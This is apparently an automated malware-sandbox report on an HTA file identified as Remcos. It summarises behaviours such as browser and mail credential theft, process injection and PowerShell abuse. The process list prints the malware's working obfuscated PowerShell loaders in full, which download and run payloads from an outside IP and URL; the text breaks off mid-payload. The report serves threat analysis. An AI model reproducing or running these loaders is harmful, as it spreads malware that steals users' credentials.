Analysis Overview
SHA256
13cce0f3cd4d7c37976d04a6f7c8d656d1822ff8011617d130c2f2a121e4404f
Threat Level: Known bad
The file INETHTMLPAGE.hta was found to be: Known bad.
Malicious Activity Summary
Remcos
Credentials from Password Stores: Credentials from Web Browsers
Detected Nirsoft tools
NirSoft WebBrowserPassView
NirSoft MailPassView
Blocklisted process makes network request
Command and Scripting Interpreter: PowerShell
Evasion via Device Credential Deployment
Checks computer location settings
Reads user/profile data of web browsers
Accesses Microsoft Outlook accounts
Suspicious use of SetThreadContext
System Location Discovery: System Language Discovery
Enumerates physical storage devices
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Modifies registry class
Modifies Internet Explorer settings
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: MapViewOfSection
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-08-06 20:55
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-08-06 20:55
Reported
2024-08-06 20:57
Platform
win7-20240704-en
Max time kernel
16s
Max time network
22s
Command Line
Signatures
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Evasion via Device Credential Deployment
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2212144002-1172735686-1556890956-1000\Software\Microsoft\Internet Explorer\Main | C:\Windows\SysWOW64\mshta.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\INETHTMLPAGE.hta"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" "/c pOwERSheLl -eX bypAsS -NOP -w 1 -C deviCECRedeNTIAldepLoyMENt ; IEX($(iEx('[systeM.teXT.ENCODIng]'+[cHaR]0X3A+[ChaR]0x3a+'utF8.GETStrinG([sysTem.cONvert]'+[CHAr]0X3A+[CHAR]0x3A+'fRomBAsE64sTriNG('+[chAR]0x22+'JDRISjg3RUhyOGkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBZGQtVHlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVNQmVSZEVGSW5JdGlvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJsbU9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB2YmdNa2RjLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBySkIsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGhWLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQVBrTUNMR1p0LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBXRmx4SktqWCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiUXhLSGloQ3YiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1Fc3BhQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaGdzeXNhc1JGQmogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkNEhKODdFSHI4aTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjEwOS4xNDcvMjAvc2VhdGZvcmFnaXJsZnJpZW5kd2hva2lzc2Zsb3dlcndhc2UuZ0lGIiwiJEVuVjpBUFBEQVRBXHNlYXRmb3JhZ2lybGZyaWVuZHdob2tpc3NmbG93ZXJ3YS52QlMiLDAsMCk7U3RBclQtU2xFZXAoMyk7U1RhclQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFbnY6QVBQREFUQVxzZWF0Zm9yYWdpcmxmcmllbmR3aG9raXNzZmxvd2Vyd2EudkJTIg=='+[CHaR]0X22+'))')))"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
pOwERSheLl -eX bypAsS -NOP -w 1 -C deviCECRedeNTIAldepLoyMENt ; IEX($(iEx('[systeM.teXT.ENCODIng]'+[cHaR]0X3A+[ChaR]0x3a+'utF8.GETStrinG([sysTem.cONvert]'+[CHAr]0X3A+[CHAR]0x3A+'fRomBAsE64sTriNG('+[chAR]0x22+'JDRISjg3RUhyOGkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBZGQtVHlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVNQmVSZEVGSW5JdGlvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJsbU9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB2YmdNa2RjLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBySkIsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGhWLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQVBrTUNMR1p0LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBXRmx4SktqWCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiUXhLSGloQ3YiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1Fc3BhQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaGdzeXNhc1JGQmogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkNEhKODdFSHI4aTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjEwOS4xNDcvMjAvc2VhdGZvcmFnaXJsZnJpZW5kd2hva2lzc2Zsb3dlcndhc2UuZ0lGIiwiJEVuVjpBUFBEQVRBXHNlYXRmb3JhZ2lybGZyaWVuZHdob2tpc3NmbG93ZXJ3YS52QlMiLDAsMCk7U3RBclQtU2xFZXAoMyk7U1RhclQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFbnY6QVBQREFUQVxzZWF0Zm9yYWdpcmxmcmllbmR3aG9raXNzZmxvd2Vyd2EudkJTIg=='+[CHaR]0X22+'))')))"
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\yxua9fxg.cmdline"
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESBA4B.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCBA4A.tmp"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\seatforagirlfriendwhokissflowerwa.vBS"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J㆛ ⺞ ⏬ ⦦ ⼀Bs㆛ ⺞ ⏬ ⦦ ⼀Gk㆛ ⺞ ⏬ ⦦ ⼀bgBr㆛ ⺞ ⏬ ⦦ ⼀C㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀PQ㆛ ⺞ ⏬ ⦦ ⼀g㆛ ⺞ ⏬ ⦦ ⼀Cc㆛ ⺞ ⏬ ⦦ ⼀a㆛ ⺞ ⏬ ⦦ ⼀B0㆛ ⺞ ⏬ ⦦ ⼀HQ㆛ ⺞ ⏬ ⦦ ⼀c㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀6㆛ ⺞ ⏬ ⦦ ⼀C8㆛ ⺞ ⏬ ⦦ ⼀LwBz㆛ ⺞ ⏬ ⦦ ⼀GU㆛ ⺞ ⏬ ⦦ ⼀cgB2㆛ ⺞ ⏬ ⦦ ⼀Gk㆛ ⺞ ⏬ ⦦ ⼀Z㆛ ⺞ ⏬ ⦦ ⼀Bv㆛ ⺞ ⏬ ⦦ ⼀HI㆛ ⺞ ⏬ ⦦ ⼀dwBp㆛ ⺞ ⏬ ⦦ ⼀G4㆛ ⺞ ⏬ ⦦ ⼀Z㆛ ⺞ ⏬ ⦦ ⼀Bv㆛ ⺞ ⏬ ⦦ ⼀Hc㆛ ⺞ ⏬ ⦦ ⼀cw㆛ ⺞ ⏬ ⦦ ⼀u㆛ ⺞ ⏬ ⦦ ⼀GQ㆛ ⺞ ⏬ ⦦ ⼀Z㆛ ⺞ ⏬ ⦦ ⼀Bu㆛ ⺞ ⏬ ⦦ ⼀HM㆛ ⺞ ⏬ ⦦ ⼀LgBj㆛ ⺞ ⏬ ⦦ ⼀G8㆛ ⺞ ⏬ ⦦ ⼀bQ㆛ ⺞ ⏬ ⦦ ⼀u㆛ ⺞ ⏬ ⦦ ⼀GI㆛ ⺞ ⏬ ⦦ ⼀cg㆛ ⺞ ⏬ ⦦ ⼀v㆛ ⺞ ⏬ ⦦ ⼀EY㆛ ⺞ ⏬ ⦦ ⼀aQBs㆛ ⺞ ⏬ ⦦ ⼀GU㆛ ⺞ ⏬ ⦦ ⼀cw㆛ ⺞ ⏬ ⦦ ⼀v㆛ ⺞ ⏬ ⦦ ⼀HY㆛ ⺞ ⏬ ⦦ ⼀YgBz㆛ ⺞ ⏬ ⦦ ⼀C4㆛ ⺞ ⏬ ⦦ ⼀agBw㆛ ⺞ ⏬ ⦦ ⼀GU㆛ ⺞ ⏬ ⦦ ⼀Zw㆛ ⺞ ⏬ ⦦ ⼀n㆛ ⺞ ⏬ ⦦ ⼀Ds㆛ ⺞ ⏬ ⦦ ⼀I㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀k㆛ ⺞ ⏬ ⦦ ⼀Hc㆛ ⺞ ⏬ ⦦ ⼀ZQBi㆛ ⺞ ⏬ ⦦ ⼀EM㆛ ⺞ ⏬ ⦦ ⼀b㆛ ⺞ ⏬ ⦦ ⼀Bp㆛ ⺞ ⏬ ⦦ ⼀GU㆛ ⺞ ⏬ ⦦ ⼀bgB0㆛ ⺞ ⏬ ⦦ ⼀C㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀PQ㆛ ⺞ ⏬ ⦦ ⼀g㆛ ⺞ ⏬ ⦦ ⼀E4㆛ ⺞ ⏬ ⦦ ⼀ZQB3㆛ ⺞ ⏬ ⦦ ⼀C0㆛ ⺞ ⏬ ⦦ ⼀TwBi㆛ ⺞ ⏬ ⦦ ⼀Go㆛ ⺞ ⏬ ⦦ ⼀ZQBj㆛ ⺞ ⏬ ⦦ ⼀HQ㆛ ⺞ ⏬ ⦦ ⼀I㆛ ⺞ ⏬ ⦦ ⼀BT㆛ ⺞ ⏬ ⦦ ⼀Hk㆛ ⺞ ⏬ ⦦ ⼀cwB0㆛ ⺞ ⏬ ⦦ ⼀GU㆛ ⺞ ⏬ ⦦ ⼀bQ㆛ ⺞ ⏬ ⦦ ⼀u㆛ ⺞ ⏬ ⦦ ⼀E4㆛ ⺞ ⏬ ⦦ ⼀ZQB0㆛ ⺞ ⏬ ⦦ ⼀C4㆛ ⺞ ⏬ ⦦ ⼀VwBl㆛ ⺞ ⏬ ⦦ ⼀GI㆛ ⺞ ⏬ ⦦ ⼀QwBs㆛ ⺞ ⏬ ⦦ ⼀Gk㆛ ⺞ ⏬ ⦦ ⼀ZQBu㆛ ⺞ ⏬ ⦦ ⼀HQ㆛ ⺞ ⏬ ⦦ ⼀Ow㆛ ⺞ ⏬ ⦦ ⼀g㆛ ⺞ ⏬ ⦦ ⼀HQ㆛ ⺞ ⏬ ⦦ ⼀cgB5㆛ ⺞ ⏬ ⦦ ⼀C㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀ew㆛ ⺞ ⏬ ⦦ ⼀g㆛ ⺞ ⏬ ⦦ ⼀CQ㆛ ⺞ ⏬ ⦦ ⼀Z㆛ ⺞ ⏬ ⦦ ⼀Bv㆛ ⺞ ⏬ ⦦ ⼀Hc㆛ ⺞ ⏬ ⦦ ⼀bgBs㆛ ⺞ ⏬ ⦦ ⼀G8㆛ ⺞ ⏬ ⦦ ⼀YQBk㆛ ⺞ ⏬ ⦦ ⼀GU㆛ ⺞ ⏬ ⦦ ⼀Z㆛ ⺞ ⏬ ⦦ ⼀BE㆛ ⺞ ⏬ ⦦ ⼀GE㆛ ⺞ ⏬ ⦦ ⼀d㆛ ⺞ ⏬ ⦦ ⼀Bh㆛ ⺞ ⏬ ⦦ ⼀C㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀PQ㆛ ⺞ ⏬ ⦦ ⼀g㆛ ⺞ ⏬ ⦦ ⼀CQ㆛ ⺞ ⏬ ⦦ ⼀dwBl㆛ ⺞ ⏬ ⦦ ⼀GI㆛ ⺞ ⏬ ⦦ ⼀QwBs㆛ ⺞ ⏬ ⦦ ⼀Gk㆛ ⺞ ⏬ ⦦ ⼀ZQBu㆛ ⺞ ⏬ ⦦ ⼀HQ㆛ ⺞ ⏬ ⦦ ⼀LgBE㆛ ⺞ ⏬ ⦦ ⼀G8㆛ ⺞ ⏬ ⦦ ⼀dwBu㆛ ⺞ ⏬ ⦦ ⼀Gw㆛ ⺞ ⏬ ⦦ ⼀bwBh㆛ ⺞ ⏬ ⦦ ⼀GQ㆛ ⺞ ⏬ ⦦ ⼀R㆛ ⺞ ⏬ ⦦ ⼀Bh㆛ ⺞ ⏬ ⦦ ⼀HQ㆛ ⺞ ⏬ ⦦ ⼀YQ㆛ ⺞ ⏬ ⦦ ⼀o㆛ ⺞ ⏬ ⦦ ⼀CQ㆛ ⺞ ⏬ ⦦ ⼀b㆛ ⺞ ⏬ ⦦ ⼀Bp㆛ ⺞ ⏬ ⦦ ⼀G4㆛ ⺞ ⏬ ⦦ ⼀aw㆛ ⺞ ⏬ ⦦ ⼀p㆛ ⺞ ⏬ ⦦ ⼀C㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀fQ㆛ ⺞ ⏬ ⦦ ⼀g㆛ ⺞ ⏬ ⦦ ⼀GM㆛ ⺞ ⏬ ⦦ ⼀YQB0㆛ ⺞ ⏬ ⦦ ⼀GM㆛ ⺞ ⏬ ⦦ ⼀a㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀g㆛ ⺞ ⏬ ⦦ ⼀Hs㆛ ⺞ ⏬ ⦦ ⼀I㆛ ⺞ ⏬ ⦦ ⼀BX㆛ ⺞ ⏬ ⦦ ⼀HI㆛ ⺞ ⏬ ⦦ ⼀aQB0㆛ ⺞ ⏬ ⦦ ⼀GU㆛ ⺞ ⏬ ⦦ ⼀LQBI㆛ ⺞ ⏬ ⦦ ⼀G8㆛ ⺞ ⏬ ⦦ ⼀cwB0㆛ ⺞ ⏬ ⦦ ⼀C㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀JwBG㆛ ⺞ ⏬ ⦦ ⼀GE㆛ ⺞ ⏬ ⦦ ⼀aQBs㆛ ⺞ ⏬ ⦦ ⼀GU㆛ ⺞ ⏬ ⦦ ⼀Z㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀g㆛ ⺞ ⏬ ⦦ ⼀FQ㆛ ⺞ ⏬ ⦦ ⼀bw㆛ ⺞ ⏬ ⦦ ⼀g㆛ ⺞ ⏬ ⦦ ⼀GQ㆛ ⺞ ⏬ ⦦ ⼀bwB3㆛ ⺞ ⏬ ⦦ ⼀G4㆛ ⺞ ⏬ ⦦ ⼀b㆛ ⺞ ⏬ ⦦ ⼀Bv㆛ ⺞ ⏬ ⦦ ⼀GE㆛ ⺞ ⏬ ⦦ ⼀Z㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀g㆛ ⺞ ⏬ ⦦ ⼀GQ㆛ ⺞ ⏬ ⦦ ⼀YQB0㆛ ⺞ ⏬ ⦦ ⼀GE㆛ ⺞ ⏬ ⦦ ⼀I㆛ ⺞ ⏬ ⦦ ⼀Bm㆛ ⺞ ⏬ ⦦ ⼀HI㆛ ⺞ ⏬ ⦦ ⼀bwBt㆛ ⺞ ⏬ ⦦ ⼀C㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀J㆛ ⺞ ⏬ ⦦ ⼀Bs㆛ ⺞ ⏬ ⦦ ⼀Gk㆛ ⺞ ⏬ ⦦ ⼀bgBr㆛ ⺞ ⏬ ⦦ ⼀Cc㆛ ⺞ ⏬ ⦦ ⼀I㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀t㆛ ⺞ ⏬ ⦦ ⼀EY㆛ ⺞ ⏬ ⦦ ⼀bwBy㆛ ⺞ ⏬ ⦦ ⼀GU㆛ ⺞ ⏬ ⦦ ⼀ZwBy㆛ ⺞ ⏬ ⦦ ⼀G8㆛ ⺞ ⏬ ⦦ ⼀dQBu㆛ ⺞ ⏬ ⦦ ⼀GQ㆛ ⺞ ⏬ ⦦ ⼀QwBv㆛ ⺞ ⏬ ⦦ ⼀Gw㆛ ⺞ ⏬ ⦦ ⼀bwBy㆛ ⺞ ⏬ ⦦ ⼀C㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀UgBl㆛ ⺞ ⏬ ⦦ ⼀GQ㆛ ⺞ ⏬ ⦦ ⼀Ow㆛ ⺞ ⏬ ⦦ ⼀g㆛ ⺞ ⏬ ⦦ ⼀GU㆛ ⺞ ⏬ ⦦ ⼀e㆛ ⺞ ⏬ ⦦ ⼀Bp㆛ ⺞ ⏬ ⦦ ⼀HQ㆛ ⺞ ⏬ ⦦ ⼀I㆛ ⺞ ⏬ ⦦ ⼀B9㆛ ⺞ ⏬ ⦦ ⼀Ds㆛ ⺞ ⏬ ⦦ ⼀I㆛ ⺞ ⏬ ⦦ ⼀Bp㆛ ⺞ ⏬ ⦦ ⼀GY㆛ ⺞ ⏬ ⦦ ⼀I㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀o㆛ ⺞ ⏬ ⦦ ⼀CQ㆛ ⺞ ⏬ ⦦ ⼀Z㆛ ⺞ ⏬ ⦦ ⼀Bv㆛ ⺞ ⏬ ⦦ ⼀Hc㆛ ⺞ ⏬ ⦦ ⼀bgBs㆛ ⺞ ⏬ ⦦ ⼀G8㆛ ⺞ ⏬ ⦦ ⼀YQBk㆛ ⺞ ⏬ ⦦ ⼀GU㆛ ⺞ ⏬ ⦦ ⼀Z㆛ ⺞ ⏬ ⦦ ⼀BE㆛ ⺞ ⏬ ⦦ ⼀GE㆛ ⺞ ⏬ ⦦ ⼀d㆛ ⺞ ⏬ ⦦ ⼀Bh㆛ ⺞ ⏬ ⦦ ⼀C㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀LQBu㆛ ⺞ ⏬ ⦦ ⼀GU㆛ ⺞ ⏬ ⦦ ⼀I㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀k㆛ ⺞ ⏬ ⦦ ⼀G4㆛ ⺞ ⏬ ⦦ ⼀dQBs㆛ ⺞ ⏬ ⦦ ⼀Gw㆛ ⺞ ⏬ ⦦ ⼀KQ㆛ ⺞ ⏬ ⦦ ⼀g㆛ ⺞ ⏬ ⦦ ⼀Hs㆛ ⺞ ⏬ ⦦ ⼀I㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀k㆛ ⺞ ⏬ ⦦ ⼀Gk㆛ ⺞ ⏬ ⦦ ⼀bQBh㆛ ⺞ ⏬ ⦦ ⼀Gc㆛ ⺞ ⏬ ⦦ ⼀ZQBU㆛ ⺞ ⏬ ⦦ ⼀GU㆛ ⺞ ⏬ ⦦ ⼀e㆛ ⺞ ⏬ ⦦ ⼀B0㆛ ⺞ ⏬ ⦦ ⼀C㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀PQ㆛ ⺞ ⏬ ⦦ ⼀g㆛ ⺞ ⏬ ⦦ ⼀Fs㆛ ⺞ ⏬ ⦦ ⼀UwB5㆛ ⺞ ⏬ ⦦ ⼀HM㆛ ⺞ ⏬ ⦦ ⼀d㆛ ⺞ ⏬ ⦦ ⼀Bl㆛ ⺞ ⏬ ⦦ ⼀G0㆛ ⺞ ⏬ ⦦ ⼀LgBU㆛ ⺞ ⏬ ⦦ ⼀GU㆛ ⺞ ⏬ ⦦ ⼀e㆛ ⺞ ⏬ ⦦ ⼀B0㆛ ⺞ ⏬ ⦦ ⼀C4㆛ ⺞ ⏬ ⦦ ⼀RQBu㆛ ⺞ ⏬ ⦦ ⼀GM㆛ ⺞ ⏬ ⦦ ⼀bwBk㆛ ⺞ ⏬ ⦦ ⼀Gk㆛ ⺞ ⏬ ⦦ ⼀bgBn㆛ ⺞ ⏬ ⦦ ⼀F0㆛ ⺞ ⏬ ⦦ ⼀Og㆛ ⺞ ⏬ ⦦ ⼀6㆛ ⺞ ⏬ ⦦ ⼀FU㆛ ⺞ ⏬ ⦦ ⼀V㆛ ⺞ ⏬ ⦦ ⼀BG㆛ ⺞ ⏬ ⦦ ⼀Dg㆛ ⺞ ⏬ ⦦ ⼀LgBH㆛ ⺞ ⏬ ⦦ ⼀GU㆛ ⺞ ⏬ ⦦ ⼀d㆛ ⺞ ⏬ ⦦ ⼀BT㆛ ⺞ ⏬ ⦦ ⼀HQ㆛ ⺞ ⏬ ⦦ ⼀cgBp㆛ ⺞ ⏬ ⦦ ⼀G4㆛ ⺞ ⏬ ⦦ ⼀Zw㆛ ⺞ ⏬ ⦦ ⼀o㆛ ⺞ ⏬ ⦦ ⼀CQ㆛ ⺞ ⏬ ⦦ ⼀Z㆛ ⺞ ⏬ ⦦ ⼀Bv㆛ ⺞ ⏬ ⦦ ⼀Hc㆛ ⺞ ⏬ ⦦ ⼀bgBs㆛ ⺞ ⏬ ⦦ ⼀G8㆛ ⺞ ⏬ ⦦ ⼀YQBk㆛ ⺞ ⏬ ⦦ ⼀GU㆛ ⺞ ⏬ ⦦ ⼀Z㆛ ⺞ ⏬ ⦦ ⼀BE㆛ ⺞ ⏬ ⦦ ⼀GE㆛ ⺞ ⏬ ⦦ ⼀d㆛ ⺞ ⏬ ⦦ ⼀Bh㆛ ⺞ ⏬ ⦦ ⼀Ck㆛ ⺞ ⏬ ⦦ ⼀Ow㆛ ⺞ ⏬ ⦦ ⼀g㆛ ⺞ ⏬ ⦦ ⼀CQ㆛ ⺞ ⏬ ⦦ ⼀cwB0㆛ ⺞ ⏬ ⦦ ⼀GE㆛ ⺞ ⏬ ⦦ ⼀cgB0㆛ ⺞ ⏬ ⦦ ⼀EY㆛ ⺞ ⏬ ⦦ ⼀b㆛ ⺞ ⏬ ⦦ ⼀Bh㆛ ⺞ ⏬ ⦦ ⼀Gc㆛ ⺞ ⏬ ⦦ ⼀I㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀9㆛ ⺞ ⏬ ⦦ ⼀C㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀Jw㆛ ⺞ ⏬ ⦦ ⼀8㆛ ⺞ ⏬ ⦦ ⼀Dw㆛ ⺞ ⏬ ⦦ ⼀QgBB㆛ ⺞ ⏬ ⦦ ⼀FM㆛ ⺞ ⏬ ⦦ ⼀RQ㆛ ⺞ ⏬ ⦦ ⼀2㆛ ⺞ ⏬ ⦦ ⼀DQ㆛ ⺞ ⏬ ⦦ ⼀XwBT㆛ ⺞ ⏬ ⦦ ⼀FQ㆛ ⺞ ⏬ ⦦ ⼀QQBS㆛ ⺞ ⏬ ⦦ ⼀FQ㆛ ⺞ ⏬ ⦦ ⼀Pg㆛ ⺞ ⏬ ⦦ ⼀+㆛ ⺞ ⏬ ⦦ ⼀Cc㆛ ⺞ ⏬ ⦦ ⼀Ow㆛ ⺞ ⏬ ⦦ ⼀g㆛ ⺞ ⏬ ⦦ ⼀CQ㆛ ⺞ ⏬ ⦦ ⼀ZQBu㆛ ⺞ ⏬ ⦦ ⼀GQ㆛ ⺞ ⏬ ⦦ ⼀RgBs㆛ ⺞ ⏬ ⦦ ⼀GE㆛ ⺞ ⏬ ⦦ ⼀Zw㆛ ⺞ ⏬ ⦦ ⼀g㆛ ⺞ ⏬ ⦦ ⼀D0㆛ ⺞ ⏬ ⦦ ⼀I㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀n㆛ ⺞ ⏬ ⦦ ⼀Dw㆛ ⺞ ⏬ ⦦ ⼀P㆛ ⺞ ⏬ ⦦ ⼀BC㆛ ⺞ ⏬ ⦦ ⼀EE㆛ ⺞ ⏬ ⦦ ⼀UwBF㆛ ⺞ ⏬ ⦦ ⼀DY㆛ ⺞ ⏬ ⦦ ⼀N㆛ ⺞ ⏬ ⦦ ⼀Bf㆛ ⺞ ⏬ ⦦ ⼀EU㆛ ⺞ ⏬ ⦦ ⼀TgBE㆛ ⺞ ⏬ ⦦ ⼀D4㆛ ⺞ ⏬ ⦦ ⼀Pg㆛ ⺞ ⏬ ⦦ ⼀n㆛ ⺞ ⏬ ⦦ ⼀Ds㆛ ⺞ ⏬ ⦦ ⼀I㆛ ⺞ ⏬ ⦦ ⼀㆛ ⺞ ⏬ ⦦ ⼀k㆛ ⺞ ⏬ ⦦ ⼀HM㆛ ⺞ ⏬ ⦦ ⼀d㆛ ⺞ ⏬ ⦦ ⼀Bh㆛ ⺞ ⏬ ⦦ ⼀HI㆛ ⺞ ⏬ ⦦ ⼀d㆛ ⺞ 